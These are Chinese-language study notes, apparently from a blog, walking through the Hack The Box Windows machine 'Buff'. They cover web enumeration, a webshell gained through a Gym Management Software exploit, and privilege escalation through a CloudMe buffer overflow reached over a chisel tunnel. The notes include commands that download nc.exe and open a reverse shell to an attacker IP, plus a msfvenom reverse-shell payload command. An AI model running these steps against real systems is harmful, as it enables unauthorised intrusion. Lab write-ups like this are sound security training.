HTB 学习笔记
【Hack The Box】windows练习-- Buff
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月4日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
信息收集
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
|_http-open-proxy: Proxy might be redirecting requests
我姑且认为这是一个用户名,然后还发现了一个可能是版本信息的东西
mrb3n
Made using Gym Management Software 1.0
去谷歌搜了一下
登陆绕过失败,绕过不了
但是它同时也说了存在一个upload目录可以绕过拿到webshell
目录爆破
我也确实扫出来了,但是不允许访问
那就先过,因为这是一个apache的站,所以我着重扫描了一下php的存在
发现的几个东西都没有啥东西,bp抓包分析了一下也不行
webshell
其实很奇怪,为什么谷歌没有搜到这个py脚本呢
直接执行即可,别忘了最后的/
反弹一个shell回来
curl http://10.10.14.20/nc.exe -o nc.exe
nc.exe -e cmd.exe 10.10.14.20 1234
提权
然后几个常用的枚举都不行,内核简单看来也没啥东西
那就分析一下服务
服务信息枚举
netstat -ano | findstr TCP | findstr ":0"
发现一个8888非常显眼,我一度以为是我开的
因为我真的很想发财
tasklist /v | findstr 7400
用下面这个命令全局搜索
for /r c:/ %i in (CloudMe*) do @echo %i
然后找到了这个文件
抓紧时间,因为会错过
然后把这个玩意放到search里搜索一下,发现是个缓冲区溢出
但是那个程序是本地开放的,并且windows里有也没有python
只能做个隧道
隧道搭建
./chisel_1.6.0_linux_amd64 server -p 8000 --reverse
./chisel.exe client 10.10.14.13:8000 R:8888:localhost:8888
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
然后直接用就行了